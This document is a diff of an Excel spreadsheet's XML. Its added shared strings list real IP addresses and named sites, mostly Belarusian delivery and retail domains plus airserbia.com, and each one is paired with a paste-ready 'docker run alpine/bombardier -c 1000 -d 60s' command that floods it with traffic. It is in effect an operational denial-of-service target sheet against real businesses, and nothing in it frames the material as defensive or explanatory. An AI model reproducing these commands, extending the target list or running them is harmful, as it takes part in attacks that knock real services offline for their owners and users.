+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.164.69&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.164.69</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.76&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.168.76</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.66&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.168.66</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.219.194.11&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.219.194.11</t>
+  </si>
+  <si>
+    <t>autolight.by</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.173.136&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.172.173.136</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.247.76.71&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.247.76.71</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.32.28.254&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>64.32.28.254</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.40.92.90&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.40.92.90</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 35.186.238.101&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>35.186.238.101</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.31.217&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.31.217</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 66.81.199.56&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>66.81.199.56</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.30.201&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.30.201</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 18.116.152.12&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>18.116.152.12</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 3.130.204.160&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>3.130.204.160</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.29.14&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.29.14</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.249.83.165&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.249.83.165</t>
+  </si>
+  <si>
+    <t>dpd.by</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.20.1&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.217.20.1</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.21.1&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.217.21.1</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.66.69.19&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.66.69.19</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.40.2.9&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.40.2.9</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.201.84&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.172.201.84</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.127&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.127</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.67&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.67</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.57&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.57</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.84&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.84</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.73&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.73</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.44&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.44</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.72&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.72</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.71&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.71</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 198.54.126.25&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>198.54.126.25</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.209.148.74&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>85.209.148.74</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.84.119.237&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.84.119.237</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 167.71.55.106&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>167.71.55.106</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.128.23.153&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>52.128.23.153</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.72&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.72</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.73&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.73</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 34.102.136.180&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>34.102.136.180</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.7&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.7</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 205.178.189.131&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>205.178.189.131</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.23.56&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.23.56</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 149.232.252.3&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>149.232.252.3</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.193.27&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.124.193.27</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 149.232.252.19&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>149.232.252.19</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.155.60.4&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>45.155.60.4</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.230&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.230</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.155.60.8&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>45.155.60.8</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.138.245.10&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>62.138.245.10</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.3.234&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.3.234</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.50.4.186&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.50.4.186</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.10.224.48&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>85.10.224.48</t>
+  </si>
+  <si>
+    <t>mym.by</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.18.33&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.18.33</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.227.147&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.172.227.147</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.18.41&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.18.41</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.218.228.75&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.218.228.75</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.130.203.137&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>31.130.203.137</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 216.92.165.85&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>216.92.165.85</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.114.247.54&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.114.247.54</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.54&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.54</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.81&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.81</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.101.152.189&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>5.101.152.189</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.186.208.16&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.186.208.16</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 86.57.185.2&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>86.57.185.2</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.186.208.18&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.186.208.18</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.209.148.14&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>85.209.148.14</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.17.51.61&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>37.17.51.61</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.162.221.63&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.162.221.63</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.94.47.146&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>77.94.47.146</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.38.72.17&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.38.72.17</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 216.239.32.21&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>216.239.32.21</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 145.253.179.136&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>145.253.179.136</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 141.8.226.59&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>141.8.226.59</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.9.13&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.9.13</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.61.159&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.61.159</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.164.72&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.172.164.72</t>
+  </si>
+  <si>
+    <t>glavdostavka.by</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.200.67.2&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>37.200.67.2</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.130.202.72&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>31.130.202.72</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.58.112.173&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.58.112.173</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.92.30&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.232.92.30</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.164.21&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.172.164.21</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.164.22&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.172.164.22</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.202&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>87.236.16.202</t>
+  </si>
+  <si>
+    <t>cdek.by</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.160.223.124&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>217.160.223.124</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.58.112.174&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.58.112.174</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 173.255.194.134&amp;&amp; sleep 5;</t>
   </si>
   <si>
     <t>173.255.194.134</t>
   </si>
   <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 1.13.6.1&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
     <t>1.13.6.1</t>
   </si>
   <si>
-    <t>172.66.42.251</t>
-  </si>
-  <si>
-    <t>172.66.41.5</t>
-  </si>
-  <si>
-    <t>172.64.174.9</t>
-  </si>
-  <si>
-    <t>172.64.34.202</t>
-  </si>
-  <si>
-    <t>166.88.19.180</t>
-  </si>
-  <si>
-    <t>108.162.195.58</t>
-  </si>
-  <si>
-    <t>104.22.9.224</t>
-  </si>
-  <si>
-    <t>104.21.64.245</t>
-  </si>
-  <si>
-    <t>104.21.62.168</t>
-  </si>
-  <si>
-    <t>104.21.56.16</t>
-  </si>
-  <si>
-    <t>92.53.96.180</t>
-  </si>
-  <si>
-    <t>92.53.96.174</t>
-  </si>
-  <si>
-    <t>91.236.24.90</t>
-  </si>
-  <si>
-    <t>91.236.24.84</t>
-  </si>
-  <si>
-    <t>91.189.114.7</t>
-  </si>
-  <si>
-    <t>1.19.9.1</t>
-  </si>
-  <si>
-    <t>90.156.201.106</t>
-  </si>
-  <si>
-    <t>89.111.167.3</t>
-  </si>
-  <si>
-    <t>89.31.143.1</t>
-  </si>
-  <si>
-    <t>88.212.196.71</t>
-  </si>
-  <si>
-    <t>85.92.118.227</t>
-  </si>
-  <si>
-    <t>81.177.141.213</t>
-  </si>
-  <si>
-    <t>77.93.220.68</t>
-  </si>
-  <si>
-    <t>77.73.232.159</t>
-  </si>
-  <si>
-    <t>75.2.111.214</t>
-  </si>
-  <si>
-    <t>75.2.18.233</t>
-  </si>
-  <si>
-    <t>62.109.15.100</t>
-  </si>
-  <si>
-    <t>52.50.65.32</t>
-  </si>
-  <si>
-    <t>47.240.33.35</t>
-  </si>
-  <si>
-    <t>37.140.192.170</t>
-  </si>
-  <si>
-    <t>34.102.136.180</t>
-  </si>
-  <si>
-    <t>31.177.76.70</t>
-  </si>
-  <si>
-    <t>31.31.196.208</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 27.124.125.18&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>27.124.125.18</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.146.1&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.232.146.1</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 99.83.154.118&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>99.83.154.118</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.55.109&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.20.55.109</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.50.2&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.20.50.2</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.215.4.16&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.215.4.16</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.165.123.40&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.165.123.40</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 47.74.55.53&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>47.74.55.53</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.15.252&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.15.252</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.201.216.115&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>81.201.216.115</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.55&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.189.222.55</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.30.32.13&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.30.32.13</t>
+  </si>
+  <si>
+    <t>ponyexpress.by</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.55&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.55</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 35.214.84.143&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>35.214.84.143</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 68.66.197.242&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>68.66.197.242</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 206.55.209.12&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>206.55.209.12</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.30.200&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.30.200</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.26&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>64.233.184.26</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.250.153.26&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>142.250.153.26</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.250.27.27&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>142.250.27.27</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 209.85.202.26&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>209.85.202.26</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.253.115.26&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>172.253.115.26</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.179.83.100&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.179.83.100</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 15.197.142.173&amp;&amp; sleep 5;</t>
   </si>
   <si>
     <t>15.197.142.173</t>
   </si>
   <si>
-    <t>5.183.188.59</t>
-  </si>
-  <si>
-    <t>195.208.1.119</t>
-  </si>
-  <si>
-    <t>oborona.ru</t>
-  </si>
-  <si>
-    <t>195.20.52.17</t>
-  </si>
-  <si>
-    <t>188.214.128.77</t>
-  </si>
-  <si>
-    <t>185.215.4.10</t>
-  </si>
-  <si>
-    <t>185.165.123.36</t>
-  </si>
-  <si>
-    <t>185.53.177.12</t>
-  </si>
-  <si>
-    <t>104.21.32.223</t>
-  </si>
-  <si>
-    <t>104.21.17.144</t>
-  </si>
-  <si>
-    <t>95.216.245.81</t>
-  </si>
-  <si>
-    <t>91.217.21.1</t>
-  </si>
-  <si>
-    <t>90.156.201.107</t>
-  </si>
-  <si>
-    <t>87.236.16.70</t>
-  </si>
-  <si>
-    <t>77.73.24.205</t>
-  </si>
-  <si>
-    <t>31.31.205.163</t>
-  </si>
-  <si>
-    <t>31.28.24.244</t>
-  </si>
-  <si>
-    <t>23.111.114.10</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.230.63.107&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.230.63.107</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.107.56.53&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.107.56.53</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.47.44&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.47.44</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.31.141&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.31.141</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.67.33.38&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>172.67.33.38</t>
+  </si>
+  <si>
+    <t>airserbia.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 103.224.182.244&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>103.224.182.244</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.20.216.16&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.20.216.16</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.12.89&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.12.89</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 13.248.148.254&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>13.248.148.254</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 162.247.239.92&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>162.247.239.92</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 173.239.5.6&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>173.239.5.6</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.53.179.170&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.53.179.170</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.138.189.150&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.138.189.150</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 198.54.117.210&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>198.54.117.210</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 208.91.197.26&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>208.91.197.26</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.129.3.5&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.129.3.5</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.252.193.51&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>46.252.193.51</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 75.119.201.87&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>75.119.201.87</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.171.28.45&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>81.171.28.45</t>
   </si>
 </sst>
 </file>
@@ -323,11 +1208,11 @@
   <numFmts count="1">
     <numFmt numFmtId="0" formatCode="General"/>
   </numFmts>
-  <fonts count="3">
+  <fonts count="4">
     <font>
-      <sz val="11"/>
+      <sz val="12"/>
       <color indexed="8"/>
-      <name val="Arial"/>
+      <name val="Calibri"/>
     </font>
     <font>
       <sz val="12"/>
@@ -339,19 +1224,18 @@
       <color indexed="8"/>
       <name val="Calibri"/>
     </font>
+    <font>
+      <sz val="11"/>
+      <color indexed="8"/>
+      <name val="Menlo Regular"/>
+    </font>
   </fonts>
-  <fills count="3">
+  <fills count="2">
     <fill>
       <patternFill patternType="none"/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
-    </fill>
-    <fill>
-      <patternFill patternType="solid">
-        <fgColor indexed="9"/>
-        <bgColor auto="1"/>
-      </patternFill>
     </fill>
   </fills>
   <borders count="2">
@@ -364,16 +1248,16 @@
     </border>
     <border>
       <left style="thin">
-        <color indexed="10"/>
+        <color indexed="9"/>
       </left>
       <right style="thin">
-        <color indexed="10"/>
+        <color indexed="9"/>
       </right>
       <top style="thin">
-        <color indexed="10"/>
+        <color indexed="9"/>
       </top>
       <bottom style="thin">
